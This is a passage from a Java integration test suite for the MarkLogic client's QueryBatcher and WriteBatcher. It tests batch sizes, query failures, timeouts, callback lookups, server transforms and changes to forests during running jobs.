"/data/"; String combQueryFileDir = dataConfigDirPath + "/combined/"; //Use WriteBatcher to write the same files. 
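      // Only two documents (pathindex1.xml and pathindex2.xml) are written; the path-index
      // combined query below is expected to return both URIs.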
WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); wbatcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); wbatcher.add(filenames[0], contentHandle1); wbatcher.add(filenames[1], contentHandle2); // Verify if the batch flushes when batch size is reached. // Flush wbatcher.flushAndWait(); wbatcher.awaitCompletion(); // get the combined query File file = new File(combQueryFileDir+combinedQueryFileName); // create a handle for the search criteria FileHandle rawHandle = new FileHandle(file); rawHandle.withFormat(Format.XML); // create a search definition based on the handle RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // Run a QueryBatcher on the new URIs. QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions"); } // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Number of reults returned is incorrect", 2, res.length); assertTrue("URI returned not correct", res[0].contains("pathindex1.xml")?true:(res[1].contains("pathindex1.xml")?true:false)); assertTrue("URI returned not correct", res[0].contains("pathindex2.xml")?true:(res[1].contains("pathindex2.xml")?true:false)); } } catch (Exception e) { System.out.println("Exceptions thrown from testRawCombinedQueryPathIndex"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); Thread.sleep(10000); clientTmp.release(); } } /* * To test query by example with WriteBatcher and QueryBatcher * with Query Failure (incorrect query syntax). * * @throws IOException * @throws InterruptedException */ // EA 3 Modify the test for batch failure results. Remove the fail. @Ignore public void testQueryBatcherQueryFailures() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherQueryFailures"); String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. 
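      // NOTE: the combined query constructed further below misspells two option keys
      // ("return-metrcs", "transorm-results"); that appears to be deliberate, so that
      // onQueryFailure fires as described in the comment above this test.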
String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); batcher.add("/fail-contraints1.xml", contentHandle1); batcher.add("/fail-contraints2.xml", contentHandle2); batcher.add("/fail-contraints3.xml", contentHandle3); batcher.add("/fail-contraints4.xml", contentHandle4); batcher.add("/fail-contraints5.xml", contentHandle5); // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuilder batchFailResults = new StringBuilder(); // create query def String combinedQuery = "{\"search\":" + "{\"query\":{\"value-constraint-query\":{\"constraint-name\":\"id\", \"text\":\"0026\"}}," + "\"options\":{\"return-metrcs\":false, \"return-qtext\":false, \"debug\":true, \"transorm-results\":{\"apply\":\"raw\"}," + "\"constraint\":{\"name\":\"id\", \"value\":{\"element\":{\"ns\":\"\", \"name\":\"id\"}}}}}}"; System.out.println("QUERY IS : "+ combinedQuery); // create a handle for the search criteria StringHandle rawHandle = new StringHandle(combinedQuery); rawHandle.setFormat(Format.JSON); QueryManager queryMgr = client.newQueryManager(); // create a search definition based on the handle RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str).append('|'); } batchResults.append(batch.getJobResultsSoFar()) .append('|') .append(batch.getForest().getForestName()) .append('|') .append(batch.getJobBatchNumber()) .append('|'); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); Forest forest = throwable.getForest(); batchFailResults.append("Test has Exceptions") .append('|') .append(throwable.getForestResultsSoFar()) .append('|') /*.append(throwable. getJobRecordNumber()) .append('|') .append(throwable.getBatchRecordNumber()) .append('|') .append(throwable.getSourceUri()) .append('|') .append(throwable.getMimetype()) .append('|') */ .append(forest.getForestName()) .append('|') .append(forest.getHost()) .append('|') .append(forest.getDatabaseName()) .append('|') /*.append(forest.isDeleteOnly()) .append('|')*/ .append(forest.isUpdateable()); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { // Write out and assert on query failures. System.out.println("Exception Buffer contents on Query Exceptions received from callback onQueryFailure"); System.out.println(batchFailResults.toString()); // Remove this failure once there are no NPEs and doa asserts on various counters in failure scenario. 
fail("Test failed due to exceptions"); } } } /* * To test QueryBatcher's callback support by invoking the client object to do a lookup * Insert only one document to validate the functionality * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherCallbackClient() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherCallbackClient"); String[] filenames = {"constraint1.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); // Move to individual data sub folders. String dataFileDir = dataConfigDirPath + "/data/"; InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); batcher.add("contraints1.json", contentHandle1); // Flush batcher.flushAndWait(); StringBuffer batchFailResults = new StringBuffer(); String expectedStr = "Vannevar Bush wrote an article for The Atlantic Monthly"; QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("Vannevar"); // Run a QueryBatcher. QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.withBatchSize(1000); //Hold for contents read back from callback client. StringBuffer ccBuf = new StringBuffer(); queryBatcher1.onUrisReady(batch-> { // Do a lookup back into the database with the client and batch content. // Want to verify if the client object can be utilized from a Callback. JSONDocumentManager docMgr = batch.getClient().newJSONDocumentManager(); JacksonHandle jh = new JacksonHandle(); docMgr.read(batch.getItems()[0], jh); System.out.println("JH Contents is " + jh.get().toString()); System.out.println("Batch Contents is " + batch.getItems()[0]); ccBuf.append(jh.get().toString()); }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions").append('|'); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); if (queryBatcher1.isStopped()) { if( !batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { // Write out and assert on query failures. System.out.println("Exception Buffer contents on Query Exceptions received from callback onQueryFailure"); System.out.println(batchFailResults.toString()); fail("Test failed due to exceptions"); } System.out.println("Contents from the callback are : " + ccBuf.toString()); // Verify the Callback contents. assertTrue("Lookup for a document from Callback using the client failed", ccBuf.toString().contains(expectedStr)); } } /* * Test to validate QueryBatcher when there is no data. * No search results are returned. */ @Test public void testQueryBatcherWithNoData() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherWithNoData"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); // Run a QueryBatcher when no results are returned. 
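      // Per the test description above, no matching data exists for this criteria, so
      // onUrisReady should not fire and batchNoResults is expected to remain empty (asserted below).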
QueryBatcher queryBatcherNoResult = dmManager.newQueryBatcher(querydef); StringBuilder batchNoResults = new StringBuilder(); StringBuilder batchNoFailResults = new StringBuilder(); queryBatcherNoResult.onUrisReady(batch -> { for (String str : batch.getItems()) { batchNoResults.append(str).append('|'); } }); queryBatcherNoResult.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure when no results returned"); // Should be empty in a successful run. Else fill the buffer to report error. batchNoFailResults.append("Test has Exceptions"); batchNoFailResults.append("|"); }); JobTicket jobTicketNoRes = dmManager.startJob(queryBatcherNoResult); queryBatcherNoResult.awaitCompletion(30, TimeUnit.SECONDS); if (queryBatcherNoResult.isStopped()) { assertTrue("Query returned no results when there is no data" , batchNoResults.toString().isEmpty()); } } /* * To test query by example with WriteBatcher and QueryBatcher * 1) Verify batch size on QueryBatcher. * * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherBatchSize() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherBatchSize"); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 1K documents for (int i = 0; i < 1000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // Run a QueryBatcher with a large AwaitTermination. QueryBatcher queryBatcherbatchSize = dmManager.newQueryBatcher(querydef); queryBatcherbatchSize.withBatchSize(20); Calendar calBef = Calendar.getInstance(); long before = calBef.getTimeInMillis(); queryBatcherbatchSize.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()).append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherbatchSize.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|'); }); JobTicket jobTicket = dmManager.startJob(queryBatcherbatchSize); // Make sure to modify TimeUnit.TIMEUNIT.Method(duration) below before the assert queryBatcherbatchSize.awaitCompletion(3, TimeUnit.MINUTES); Calendar calAft; long after = 0L; long duration = 0L; long queryJobTimeoutValue = 0L; while(!queryBatcherbatchSize.isStopped()) { // do nothing. } // Check the time of termination calAft = Calendar.getInstance(); after = calAft.getTimeInMillis(); duration = after - before; queryJobTimeoutValue = TimeUnit.MINUTES.toSeconds(duration); if (queryBatcherbatchSize.isStopped()) { System.out.println("Duration is ===== " + queryJobTimeoutValue); System.out.println(batchResults.toString()); assertEquals("Number of batches should have been 50", batchResults.toString().split("\\|").length, 50); } //Clear the contents for next query host batcher object results. 
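      // (The 50-batch expectation above follows from the batch size of 20 over 1,000 matching URIs.)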
		batchResults.setLength(0);
		batchFailResults.setLength(0);

		// Run a QueryBatcher with a small AwaitTermination.
		QueryBatcher queryBatcherSmallTimeout = dmManager.newQueryBatcher(querydef);
		queryBatcherSmallTimeout.withBatchSize(1000);

		queryBatcherSmallTimeout.onUrisReady(batch-> {
			batchResults.append(batch.getJobBatchNumber()).append('|');
			System.out.println("QueryBatcher with 1000 batch size - Batch Number is " + batch.getJobBatchNumber());
		});
		queryBatcherSmallTimeout.onQueryFailure(throwable -> {
			System.out.println("Exceptions thrown from callback onQueryFailure");
			batchFailResults.append("Test has Exceptions").append('|');
			batchFailResults.append(throwable.getJobBatchNumber());
		});

		JobTicket jobTicketTimeout = dmManager.startJob(queryBatcherSmallTimeout);
		queryBatcherSmallTimeout.awaitCompletion(5, TimeUnit.MILLISECONDS);

		if (queryBatcherSmallTimeout.isStopped()) {
			System.out.println(batchResults.toString());
			assertNotEquals("Number of batches should not have been 5", batchResults.toString().split("\\|").length, 5);
		}

		if (batchFailResults != null && !batchFailResults.toString().isEmpty()) {
			assertTrue("Exceptions not found when query time out value reached", batchFailResults.toString().contains("Test has Exceptions"));
		}
	}

	/*
	 * To test a string query with WriteBatcher and QueryBatcher.
	 * 1) Verify the awaitCompletion method on QueryBatcher.
	 *
	 * @throws IOException
	 * @throws InterruptedException
	 */
	@Test
	public void testQueryBatcherFailures() throws IOException, InterruptedException {
		System.out.println("Running testQueryBatcherFailures");

		String jsonDoc = "{" +
				"\"employees\": [" +
				"{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," +
				"{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," +
				"{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" +
				"}";
		// create query def
		QueryManager queryMgr = client.newQueryManager();
		StringQueryDefinition querydef = queryMgr.newStringDefinition();
		querydef.setCriteria("John AND Bob");

		WriteBatcher batcher = dmManager.newWriteBatcher();
		batcher.withBatchSize(1000);

		StringHandle handle = new StringHandle();
		handle.set(jsonDoc);

		String uri = null;

		// Insert 10K documents
		for (int i = 0; i < 10000; i++) {
			uri = "/firstName" + i + ".json";
			batcher.add(uri, handle);
		}

		// Flush
		batcher.flushAndWait();

		StringBuilder batchResults = new StringBuilder();
		StringBuilder batchFailResults = new StringBuilder();

		// Run a QueryBatcher with AwaitTermination.
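      // The timing captured below measures how long the job actually takes relative to the
      // 30-second awaitCompletion window used by this test.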
QueryBatcher queryBatcherAwait = dmManager.newQueryBatcher(querydef); Calendar calBef = Calendar.getInstance(); long before = calBef.getTimeInMillis(); JobTicket jobTicket = dmManager.startJob(queryBatcherAwait); // Make sure to modify TimeUnit.MILLISECONDS.Method(duration) below before the assert queryBatcherAwait.awaitCompletion(30, TimeUnit.SECONDS); queryBatcherAwait.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str) .append('|'); } }); queryBatcherAwait.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|'); }); Calendar calAft; long after = 0L; long duration = 0L; long quertJobTimeoutValue = 0L; while(!queryBatcherAwait.isStopped()) { // do nothing } // Check the time of termination calAft = Calendar.getInstance(); after = calAft.getTimeInMillis(); duration = after - before; quertJobTimeoutValue = TimeUnit.MILLISECONDS.toSeconds(duration); if (queryBatcherAwait.isStopped()) { System.out.println("Duration is " + quertJobTimeoutValue); if (quertJobTimeoutValue >= 30 && quertJobTimeoutValue < 35) { assertTrue("Job termination with awaitTermination passed within specified time", quertJobTimeoutValue >= 30 && quertJobTimeoutValue < 35); } else if (quertJobTimeoutValue > 35) { fail("Job termination with awaitTermination failed"); } } } @Test public void testServerXQueryTransform() throws IOException, ParserConfigurationException, SAXException, TransformerException, InterruptedException, XPathExpressionException { System.out.println("Running testServerXQueryTransform"); String transformFileDir = dataConfigDirPath + "/transforms/"; TransformExtensionsManager transMgr = client.newServerConfigManager().newTransformExtensionsManager(); ExtensionMetadata metadata = new ExtensionMetadata(); metadata.setTitle("Adding attribute xquery Transform"); metadata.setDescription("This plugin transforms an XML document by adding attribute to root node"); metadata.setProvider("MarkLogic"); metadata.setVersion("0.1"); // get the transform file from add-attr-xquery-transform.xqy File transformFile = new File(transformFileDir +"add-attr-xquery-transform.xqy"); FileHandle transformHandle = new FileHandle(transformFile); transMgr.writeXQueryTransform("add-attr-xquery-transform", transformHandle, metadata); ServerTransform transform = new ServerTransform("add-attr-xquery-transform"); transform.put("name", "Lang"); transform.put("value", "English"); String xmlStr1 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>This is so foo</foo>"; String xmlStr2 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><foo>This is so bar</foo>"; //Use WriteBatcher to write the same files. WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(5); batcher.withTransform(transform); StringHandle handleFoo = new StringHandle(); handleFoo.set(xmlStr1); StringHandle handleBar = new StringHandle(); handleBar.set(xmlStr2); String uri = null; // Insert 10 documents for (int i = 0; i < 10; i++) { uri = "foo" + i + ".xml"; batcher.add(uri, handleFoo); } for (int i = 0; i < 10; i++) { uri = "bar" + i + ".xml"; batcher.add(uri, handleBar); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("foo OR bar"); // Run a QueryBatcher on the new URIs. 
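      // All 20 documents written above match "foo OR bar", so the URI list asserted below is
      // expected to have 20 entries; each document was transformed at write time to add the Lang attribute.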
QueryBatcher queryBatcher1 = dmManager.newQueryBatcher(querydef); queryBatcher1.withBatchSize(5); queryBatcher1.onUrisReady(batch-> { for (String str : batch.getItems()) { batchResults.append(str); batchResults.append("|"); } }); queryBatcher1.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); throwable.printStackTrace(); batchFailResults.append("Test has Exceptions"); } ); JobTicket jobTicket = dmManager.startJob(queryBatcher1); if (queryBatcher1.isStopped()) { // Verify the batch results now. String[] res = batchResults.toString().split("\\|"); assertEquals("Query results URI list length returned after transformation incorrect", res.length, 20); // Get a random URI, since the URIs returned are not ordered. Get the 3rd URI. assertTrue("URI returned not correct", res[2].contains("foo") || res[2].contains("bar")); // do a lookup with the first URI using the client to verify transforms are done. DOMHandle readHandle = readDocumentUsingDOMHandle(client, res[0], "XML"); String contents = readHandle.evaluateXPath("/foo/text()", String.class); // Verify that the contents are of xmlStr1 or xmlStr2. System.out.println("Contents are : " + contents); assertTrue("Lookup for a document from Callback using the client failed", xmlStr1.contains(contents) || xmlStr2.contains(contents)); } // release client client.release(); } /* * To test QueryBatcher functionality (errors if any) when a Forest is being removed and added during a start job. * * @throws IOException * @throws InterruptedException */ @Test public void testQueryBatcherWithForestRemoveAndAdd() throws IOException, InterruptedException { System.out.println("Running testQueryBatcherWithForestRemoveAndAdd"); String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1", "QBMultipleForestDB-2", "QBMultipleForestDB-3"}; try { //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); setupAppServicesConstraint(testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 20K documents to have a sufficient large query seek time for (int i = 0; i < 20000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuffer batchResults = new StringBuffer(); StringBuffer batchFailResults = new StringBuffer(); // Run a QueryBatcher with AwaitTermination. 
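      // Per the test intent (see the comment above this method), forests are added and later
      // removed around the query job's run to observe whether the batcher still completes and
      // whether onQueryFailure reports anything.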
QueryBatcher queryBatcherAddForest = dmManager.newQueryBatcher(querydef); queryBatcherAddForest.withBatchSize(2000); queryBatcherAddForest.onUrisReady(batch-> { batchResults.append(batch.getJobBatchNumber()) .append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherAddForest.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions") .append('|') .append(throwable.getMessage()); }); JobTicket jobTicket = dmManager.startJob(queryBatcherAddForest); queryBatcherAddForest.awaitCompletion(3, TimeUnit.MINUTES); // Now add a Forests to the database. createForest(testMultipleForest[1], testMultipleDB); createForest(testMultipleForest[2], testMultipleDB); while(!queryBatcherAddForest.isStopped()) { // Do nothing. Wait for batcher to complete. } if (queryBatcherAddForest.isStopped()) { if (batchResults!= null && !batchResults.toString().isEmpty()) { System.out.print("Results from onUrisReady === "); System.out.print(batchResults.toString()); // We should be having 10 batches numbered 1 to 10. assertTrue("Batches not complete in results", batchResults.toString().contains("10")); } if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResults.toString()); assertTrue("Exceptions not found when forest added", batchFailResults.toString().contains("Test has Exceptions")); } } // Reomove a forest. StringBuffer batchResultsRem = new StringBuffer(); StringBuffer batchFailResultsRem = new StringBuffer(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherRemoveForest = dmManager.newQueryBatcher(querydef); queryBatcherRemoveForest.withBatchSize(2000); queryBatcherRemoveForest.onUrisReady(batch-> { batchResultsRem.append(batch.getJobBatchNumber()) .append('|'); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherRemoveForest.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResultsRem.append("Test has Exceptions"); batchFailResultsRem.append("|"); batchFailResultsRem.append(throwable.getMessage()); }); JobTicket jobTicketRem = dmManager.startJob(queryBatcherRemoveForest); queryBatcherRemoveForest.awaitCompletion(3, TimeUnit.MINUTES); // Now remove a Forest from the database. detachForest(testMultipleDB, testMultipleForest[2]); deleteForest(testMultipleForest[2]); while(!queryBatcherRemoveForest.isStopped()) { // Do nothing. Wait for batcher to complete. } if (queryBatcherRemoveForest.isStopped()) { if (batchResultsRem!= null && !batchResultsRem.toString().isEmpty()) { System.out.print("Results from onUrisReady === "); // We should be having 10 batches numbered 1 to 10. //TODO Add rest of the validations when feature complete. System.out.print(batchResultsRem.toString()); assertTrue("Batches not complete in results when forest removed", batchResultsRem.toString().contains("10")); } if (batchFailResultsRem!= null && !batchFailResultsRem.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResultsRem.toString()); assertTrue("Exceptions not found when forest removed", batchFailResultsRem.toString().contains("Test has Exceptions")); } } } catch(Exception e) { System.out.print(e.getMessage()); } finally { // Associate back the original DB. 
try { associateRESTServerWithDB(restServerName, dbName); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } detachForest(testMultipleDB, testMultipleForest[0]); detachForest(testMultipleDB, testMultipleForest[1]); //In case something asserts detachForest(testMultipleDB, testMultipleForest[2]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); deleteForest(testMultipleForest[1]); deleteForest(testMultipleForest[2]); Thread.sleep(10000); } } /* * To test QueryBatcher's callback support with long lookup timefor the client object to do a lookup * Insert documents to validate the functionality. * Induce a long pause which exceeds awaitTermination time. * * @throws IOException * @throws InterruptedException */ @Test public void testBatchClientLookupTimeout() throws IOException, InterruptedException { System.out.println("Running testBatchClientLookupTimeout"); String testMultipleDB = "QBMultipleForestDB"; String[] testMultipleForest = {"QBMultipleForestDB-1"}; try { //Setup a separate database/ createDB(testMultipleDB); createForest(testMultipleForest[0], testMultipleDB); associateRESTServerWithDB(restServerName, testMultipleDB); setupAppServicesConstraint(testMultipleDB); String jsonDoc = "{" + "\"employees\": [" + "{ \"firstName\":\"John\" , \"lastName\":\"Doe\" }," + "{ \"firstName\":\"Ann\" , \"lastName\":\"Smith\" }," + "{ \"firstName\":\"Bob\" , \"lastName\":\"Foo\" }]" + "}"; // create query def QueryManager queryMgr = client.newQueryManager(); StringQueryDefinition querydef = queryMgr.newStringDefinition(); querydef.setCriteria("John AND Bob"); WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(1000); StringHandle handle = new StringHandle(); handle.set(jsonDoc); String uri = null; // Insert 2K documents to have a sufficient large query seek time for (int i = 0; i < 20000; i++) { uri = "/firstName" + i + ".json"; batcher.add(uri, handle); } // Flush batcher.flushAndWait(); StringBuilder batchResults = new StringBuilder(); StringBuffer batchFailResults = new StringBuffer(); StringBuilder ccBuf = new StringBuilder(); // Run a QueryBatcher with AwaitTermination. QueryBatcher queryBatcherAddForest = dmManager.newQueryBatcher(querydef); queryBatcherAddForest.withBatchSize(200); queryBatcherAddForest.onUrisReady(batch-> { // Check only once if (ccBuf.toString().isEmpty()) { JSONDocumentManager docMgr = batch.getClient().newJSONDocumentManager(); JacksonHandle jh = new JacksonHandle(); docMgr.read(batch.getItems()[0], jh); try { // Simulate a large time in reading back the results Thread.sleep(40000); } catch (Exception e) { // TODO Auto-generated catch block System.out.println(e.getMessage()); } ccBuf.append(jh.get().toString().trim()); // The first read should exhaust the awaitTermination timeout. Buffer contains only one result. System.out.println("JH Contents is " + jh.get().toString()); System.out.println("Batch Contents is " + batch.getItems()[0]); } batchResults.append(batch.getJobBatchNumber()); batchResults.append("|"); System.out.println("Batch Numer is " + batch.getJobBatchNumber()); }); queryBatcherAddForest.onQueryFailure(throwable -> { System.out.println("Exceptions thrown from callback onQueryFailure"); batchFailResults.append("Test has Exceptions"); batchFailResults.append("|"); batchFailResults.append(throwable.getMessage()); }); // Have a small awaitCompletion timeout for the batcher. 
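      // The 40-second sleep in the first onUrisReady callback above is meant to outlast the
      // 30-second awaitCompletion below, so batchResults is expected to still be empty when asserted.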
JobTicket jobTicket = dmManager.startJob(queryBatcherAddForest); queryBatcherAddForest.awaitCompletion(30, TimeUnit.SECONDS); if (queryBatcherAddForest.isStopped()) { if (batchFailResults!= null && !batchFailResults.toString().isEmpty()) { System.out.print("Results from onQueryFailure === "); System.out.print(batchFailResults.toString()); assertTrue("Exceptions not found when forest added", batchFailResults.toString().contains("Test has Exceptions")); } } assertTrue("Batches are available in results when they should not be.", batchResults.toString().isEmpty()); } catch(Exception e) { System.out.print(e.getMessage()); } finally { // Associate back the original DB. try { associateRESTServerWithDB(restServerName, dbName); } catch (Exception e) { // TODO Auto-generated catch block e.printStackTrace(); } detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); Thread.sleep(10000); } } /* * To test QQueryBatcher when WriteBatcher writes same document. Simulate a deadlock / resource contention. * @throws IOException * @throws InterruptedException */ /*public void testSimultaneousBothBatcherAccess() throws IOException, InterruptedException { System.out.println("Running testSimultaneousBothBatcherAccess"); clearDB(restServerPort); String[] filenames = {"constraint1.json", "constraint2.json", "constraint3.json", "constraint4.json", "constraint5.json"}; WriteBatcher batcher = dmManager.newWriteBatcher(); batcher.withBatchSize(2); InputStreamHandle contentHandle1 = new InputStreamHandle(); contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); InputStreamHandle contentHandle2 = new InputStreamHandle(); contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); InputStreamHandle contentHandle3 = new InputStreamHandle(); contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); InputStreamHandle contentHandle4 = new InputStreamHandle(); contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); InputStreamHandle contentHandle5 = new InputStreamHandle(); contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); StringBuilder writebatchResults = new StringBuilder(); batcher.add("/batcher-contraints1.json", contentHandle1); batcher.add("/batcher-contraints2.json", contentHandle2); batcher.add("/batcher-contraints3.json", contentHandle3); batcher.add("/batcher-contraints4.json", contentHandle4); batcher.add("/batcher-contraints5.json", contentHandle5); // Flush batcher.flushAndWait(); StringBuffer querybatchResults = new StringBuffer(); StringBuilder querybatchFailResults = new StringBuilder(); // get the query File file = new File(dataConfigDirPath + "qbe1.json"); FileHandle fileHandle = new FileHandle(file); QueryManager queryMgr = client.newQueryManager(); RawQueryByExampleDefinition qbyexDef = queryMgr.newRawQueryByExampleDefinition(fileHandle.withFormat(Format.JSON)); // Run a QueryBatcher. 
